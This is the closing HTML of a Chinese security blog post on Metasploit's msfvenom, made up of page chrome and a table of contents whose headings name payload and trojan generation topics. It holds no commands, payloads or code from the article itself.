</article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="https://threeshui.github.io">Maxenton</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://threeshui.github.io/2022/05/04/MSF%E5%88%9D%E4%BD%93%E9%AA%8C%EF%BC%88%E4%B8%89%EF%BC%89/">https://threeshui.github.io/2022/05/04/MSF%E5%88%9D%E4%BD%93%E9%AA%8C%EF%BC%88%E4%B8%89%EF%BC%89/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://threeshui.github.io" target="_blank">Maxenton</a>！</span></div></div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/">信息安全</a><a class="post-meta__tags" href="/tags/%E5%B7%A5%E5%85%B7%E5%AD%A6%E4%B9%A0/">工具学习</a></div><div class="post_share"><div class="social-share" data-image="/img/MSF01.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/css/share.min.css" media="print" onload="this.media='all'"><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/sharejs/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2022/05/07/Python%E5%AD%A6%E4%B9%A0%E6%97%A5%E8%AE%B0%EF%BC%88%E5%85%AB%EF%BC%89/"><img class="prev-cover" src="/img/python_img.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of previous post"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">Python学习日记（八）</div></div></a></div><div class="next-post pull-right"><a href="/2022/05/04/MSF%E5%88%9D%E4%BD%93%E9%AA%8C%EF%BC%88%E4%BA%8C%EF%BC%89/"><img class="next-cover" src="/img/MSF01.png" onerror="onerror=null;src='/img/404.jpg'" alt="cover of next post"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">MSF初体验（二）</div></div></a></div></nav><div class="relatedPosts"><div class="headline"><i class="fas fa-thumbs-up fa-fw"></i><span>相关推荐</span></div><div class="relatedPosts-list"><div><a href="/2022/06/18/Cobalt%20Strike%E4%BD%93%E9%AA%8C/" title="Cobalt Strike体验"><img class="cover" src="/img/cs01.jpeg" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-06-18</div><div class="title">Cobalt Strike体验</div></div></a></div><div><a href="/2021/10/20/BurpSuite%E5%B7%A5%E5%85%B7%E7%9A%84%E5%AD%A6%E4%B9%A0%E4%B8%8E%E4%BD%BF%E7%94%A8/" title="BurpSuite工具的学习与使用"><img class="cover" src="/img/burp01.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-10-20</div><div class="title">BurpSuite工具的学习与使用</div></div></a></div><div><a href="/2021/11/01/Git%E7%9A%84%E5%BC%BA%E5%A4%A7/" title="Git的强大之处"><img class="cover" src="/img/git01.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2021-11-01</div><div class="title">Git的强大之处</div></div></a></div><div><a href="/2022/05/04/MSF%E5%88%9D%E4%BD%93%E9%AA%8C%EF%BC%88%E4%BA%8C%EF%BC%89/" title="MSF初体验（二）"><img class="cover" src="/img/MSF01.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-05-04</div><div class="title">MSF初体验（二）</div></div></a></div><div><a href="/2022/04/30/MSF%E5%88%9D%E4%BD%93%E9%AA%8C%EF%BC%88%E4%B8%80%EF%BC%89/" title="MSF初体验（一）"><img class="cover" src="/img/MSF01.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-04-30</div><div class="title">MSF初体验（一）</div></div></a></div><div><a href="/2022/05/01/Linux%E6%8F%90%E6%9D%83/" title="Linux提权"><img class="cover" src="/img/getshell.png" alt="cover"><div class="content is-center"><div class="date"><i class="far fa-calendar-alt fa-fw"></i> 2022-05-01</div><div class="title">Linux提权</div></div></a></div></div></div></div><div class="aside-content" id="aside-content"><div class="card-widget card-info"><div class="is-center"><div class="avatar-img"><img src="/img/head.jpg" onerror="this.onerror=null;this.src='/img/friend_404.gif'" alt="avatar"/></div><div class="author-info__name">Maxenton</div><div class="author-info__description">一个啥都只会一点的白帽子</div></div><div class="card-info-data site-data is-center"><a href="/archives/"><div class="headline">文章</div><div class="length-num">75</div></a><a href="/tags/"><div class="headline">标签</div><div class="length-num">38</div></a><a href="/categories/"><div class="headline">分类</div><div class="length-num">38</div></a></div><a id="card-info-btn" target="_blank" rel="noopener" href="https://blog.csdn.net/qq_15131581?spm=1030.2200.3001.5343"><i class="fab fa-cuttlefish"></i><span>CSDN欢迎关注</span></a><div class="card-info-social-icons is-center"><a class="social-icon" href="https://github.com/threeshui" target="_blank" title="Github"><i class="fab fa-github"></i></a><a class="social-icon" href="mailto:peiyimiao@foxmail.com" target="_blank" title="Email"><i class="fas fa-envelope"></i></a><a class="social-icon" href="https://blog.csdn.net/qq_15131581?spm=1030.2200.3001.5343" target="_blank" title=""><i class="fab fa-cuttlefish"></i></a></div></div><div class="card-widget card-announcement"><div class="item-headline"><i class="fas fa-bullhorn fa-shake"></i><span>公告</span></div><div class="announcement_content">欢迎来到这里，愿君所遇即所爱！</div></div><div class="sticky_layout"><div class="card-widget" id="card-toc"><div class="item-headline"><i class="fas fa-stream"></i><span>目录</span><span class="toc-percentage"></span></div><div class="toc-content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%B8%80%E3%80%81Msfvenom%E4%BB%8B%E7%BB%8D"><span class="toc-number">1.</span> <span class="toc-text">一、Msfvenom介绍</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#3%E3%80%81-f"><span class="toc-number">1.1.</span> <span class="toc-text">3、-f</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4%E3%80%81-e"><span class="toc-number">1.2.</span> <span class="toc-text">4、-e</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5%E3%80%81-a"><span class="toc-number">1.3.</span> <span class="toc-text">5、-a</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6%E3%80%81-o"><span class="toc-number">1.4.</span> <span class="toc-text">6、-o</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7%E3%80%81-b"><span class="toc-number">1.5.</span> <span class="toc-text">7、-b</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81%E8%A7%84%E9%81%BF%E6%8C%87%E5%AE%9A%E5%AD%97%E7%AC%A6"><span class="toc-number">1.6.</span> <span class="toc-text">2、规避指定字符</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#3%E3%80%81%E6%8C%87%E5%AE%9A%E7%BC%96%E7%A0%81%E5%99%A8"><span class="toc-number">1.7.</span> <span class="toc-text">3、指定编码器</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#4%E3%80%81%E7%BB%91%E5%AE%9A%E5%90%8E%E9%97%A8%E5%88%B0%E5%85%B6%E4%BB%96%E5%8F%AF%E6%89%A7%E8%A1%8C%E7%A8%8B%E5%BA%8F%E4%B8%8A"><span class="toc-number">1.8.</span> <span class="toc-text">4、绑定后门到其他可执行程序上</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#5%E3%80%81Windows%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.9.</span> <span class="toc-text">5、Windows木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#6%E3%80%81Linux%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.10.</span> <span class="toc-text">6、Linux木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#7%E3%80%81Mac%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.11.</span> <span class="toc-text">7、Mac木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#8%E3%80%81Android%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.12.</span> <span class="toc-text">8、Android木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#9%E3%80%81Powershell%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.13.</span> <span class="toc-text">9、Powershell木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#10%E3%80%81PHP%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.14.</span> <span class="toc-text">10、PHP木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#11%E3%80%81ASP%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.15.</span> <span class="toc-text">11、ASP木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#12%E3%80%81ASPX%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.16.</span> <span class="toc-text">12、ASPX木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#13%E3%80%81JSP%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.17.</span> <span class="toc-text">13、JSP木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#14%E3%80%81War%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.18.</span> <span class="toc-text">14、War木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#15%E3%80%81nodejs%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.19.</span> <span class="toc-text">15、nodejs木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#16%E3%80%81Bash%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.20.</span> <span class="toc-text">16、Bash木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#17%E3%80%81Perl%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.21.</span> <span class="toc-text">17、Perl木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#18%E3%80%81Python%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.22.</span> <span class="toc-text">18、Python木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#19%E3%80%81ruby%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.23.</span> <span class="toc-text">19、ruby木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#20%E3%80%81lua%E6%9C%A8%E9%A9%AC"><span class="toc-number">1.24.</span> <span class="toc-text">20、lua木马</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#21%E3%80%81exe%E5%88%A9%E7%94%A8exec%E6%89%A7%E8%A1%8Cpowershell"><span class="toc-number">1.25.</span> <span class="toc-text">21、exe利用exec执行powershell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#22%E3%80%81windows-shellcode"><span class="toc-number">1.26.</span> <span class="toc-text">22、windows shellcode</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#23%E3%80%81linux-shellcode"><span class="toc-number">1.27.</span> <span class="toc-text">23、linux shellcode</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#24%E3%80%81mac-shellcode"><span class="toc-number">1.28.</span> <span class="toc-text">24、mac shellcode</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%9B%9B%E3%80%81MSF%E7%9B%91%E5%90%AC"><span class="toc-number">2.</span> <span class="toc-text">四、MSF监听</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E4%BA%94%E3%80%81MSF%E5%92%8C%E9%92%89%E9%92%89%E8%81%94%E5%8A%A8"><span class="toc-number">3.</span> <span class="toc-text">五、MSF和钉钉联动</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#1%E3%80%81%E5%88%9B%E5%BB%BA%E7%BE%A4"><span class="toc-number">3.1.</span> <span class="toc-text">1、创建群</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#2%E3%80%81%E5%88%9B%E5%BB%BA%E7%BE%A4%E6%9C%BA%E5%99%A8%E4%BA%BA"><span class="toc-number">3.2.</span> <span class="toc-text">2、创建群机器人</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%85%AD%E3%80%81RC%E6%96%87%E4%BB%B6"><span class="toc-number">4.</span> <span class="toc-text">六、RC文件</span></a></li></ol></div></div><div class="card-widget card-recent-post"><div class="item-headline"><i class="fas fa-history"></i><span>最新文章</span></div><div class="aside-list"><div class="aside-list-item"><a class="thumbnail" href="/2022/11/10/docker%E9%80%83%E9%80%B8/" title="Docker逃逸"><img src="/img/docker_img.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Docker逃逸"/></a><div class="content"><a class="title" href="/2022/11/10/docker%E9%80%83%E9%80%B8/" title="Docker逃逸">Docker逃逸</a><time datetime="2022-11-09T16:00:00.000Z" title="发表于 2022-11-10 00:00:00">2022-11-10</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/11/01/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E5%AD%A6%E4%B9%A0%E2%80%94%E2%80%94%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="文件包含漏洞的学习"><img src="/img/baohan.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="文件包含漏洞的学习"/></a><div class="content"><a class="title" href="/2022/11/01/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E5%AD%A6%E4%B9%A0%E2%80%94%E2%80%94%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/" title="文件包含漏洞的学习">文件包含漏洞的学习</a><time datetime="2022-10-31T16:00:00.000Z" title="发表于 2022-11-01 00:00:00">2022-11-01</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/10/25/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E5%AD%A6%E4%B9%A0%E2%80%94%E2%80%94%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90/" title="文件解析漏洞的学习"><img src="/img/jiexi.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="文件解析漏洞的学习"/></a><div class="content"><a class="title" href="/2022/10/25/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E5%AD%A6%E4%B9%A0%E2%80%94%E2%80%94%E6%96%87%E4%BB%B6%E8%A7%A3%E6%9E%90/" title="文件解析漏洞的学习">文件解析漏洞的学习</a><time datetime="2022-10-24T16:00:00.000Z" title="发表于 2022-10-25 00:00:00">2022-10-25</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/10/15/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E6%8A%98%E8%85%BE%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5%E7%9A%84%E5%AE%9E%E6%93%8D%EF%BC%88%E5%85%AD%EF%BC%89less26-30/" title="SQL注入靶场（六）"><img src="/img/sqlbachang.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="SQL注入靶场（六）"/></a><div class="content"><a class="title" href="/2022/10/15/%E7%94%9F%E5%91%BD%E5%9C%A8%E4%BA%8E%E6%8A%98%E8%85%BE%E2%80%94%E2%80%94SQL%E6%B3%A8%E5%85%A5%E7%9A%84%E5%AE%9E%E6%93%8D%EF%BC%88%E5%85%AD%EF%BC%89less26-30/" title="SQL注入靶场（六）">SQL注入靶场（六）</a><time datetime="2022-10-14T16:00:00.000Z" title="发表于 2022-10-15 00:00:00">2022-10-15</time></div></div><div class="aside-list-item"><a class="thumbnail" href="/2022/10/13/git%E6%8E%A8%E9%80%81%E6%9C%AC%E5%9C%B0%E5%88%B0%E5%BA%93%E9%89%B4%E6%9D%83%E5%A4%B1%E8%B4%A5/" title="Git推送本地到库鉴权失败"><img src="/img/git_img.png" onerror="this.onerror=null;this.src='/img/404.jpg'" alt="Git推送本地到库鉴权失败"/></a><div class="content"><a class="title" href="/2022/10/13/git%E6%8E%A8%E9%80%81%E6%9C%AC%E5%9C%B0%E5%88%B0%E5%BA%93%E9%89%B4%E6%9D%83%E5%A4%B1%E8%B4%A5/" title="Git推送本地到库鉴权失败">Git推送本地到库鉴权失败</a><time datetime="2022-10-12T16:00:00.000Z" title="发表于 2022-10-13 00:00:00">2022-10-13</time></div></div></div></div></div></div></main><footer id="footer" style="background-image: url('/img/MSF01.png')"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2022 By Maxenton</div><div class="framework-info"><span>框架 </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>主题 </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><div id="rightside"><div id="rightside-config-hide"></div><div id="rightside-config-show"><button id="go-up" type="button" title="回到顶部"><i class="fas fa-arrow-up"></i></button></div></div><div id="local-search"><div class="search-dialog"><nav class="search-nav"><span class="search-dialog-title">搜索</span><span id="loading-status"></span><button class="search-close-button"><i class="fas fa-times"></i></button></nav><div class="is-center" id="loading-database"><i class="fas fa-spinner fa-pulse"></i><span>  数据库加载中</span></div><div class="search-wrap"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章" type="text"/></div></div><hr/><div id="local-search-results"></div></div></div><div id="search-mask"></div></div><div><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.min.js"></script><script src="/js/search/local-search.js"></script><div class="js-pjax"></div><script src="/js/custom/custom.js"></script><script defer="defer" id="ribbon" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/canvas-ribbon.min.js" size="150" alpha="0.6" zIndex="-1" mobile="false" data-click="true"></script><script defer="defer" id="fluttering_ribbon" mobile="false" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/canvas-fluttering-ribbon.min.js"></script><script src="https://cdn.jsdelivr.net/npm/butterfly-extsrc/dist/activate-power-mode.min.js"></script><script>POWERMODE.colorful = true;
POWERMODE.shake = true;
POWERMODE.mobile = false;
document.body.addEventListener('input', POWERMODE);
</script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div></body></html>